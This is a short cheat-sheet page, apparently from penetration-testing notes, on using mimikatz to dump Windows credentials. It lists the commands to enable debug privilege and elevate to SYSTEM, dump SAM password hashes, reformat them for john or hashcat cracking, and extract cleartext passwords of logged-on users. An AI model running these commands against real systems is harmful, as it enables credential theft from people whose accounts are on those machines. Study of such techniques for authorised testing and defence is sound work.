mimikatz
Dump Password Hashes
Mimikatz needs to be ran as SYSTEM and the SeDebugPrivilege access right needs to be enabled. After launching mimikatz, run:
privilege::debug
token::elevate
If you are already SYSTEM, you do not need to run the second command Now to dump the password hashes:
lsadump::sam
This prints out a funky format. To make it more john or hashcat friendly and be a user:hash format we can do this.
grep 'User' -A 1 lsadump.txt| grep -v '-' | cut -d ':' -f 2 | sed 's/ //' | sed '$!N;s/\n/:/'
Dump Passwords of Logged on Users
It is possible to get clear text passwords of users that are logged on. After launching mimikatz, run:
privilege::debug
token::elevate
If you are already SYSTEM, you do not need to run the second command Now to dump the passwords & hashes:
sekurlsa::logonpasswords
Resources
Last updated
Was this helpful?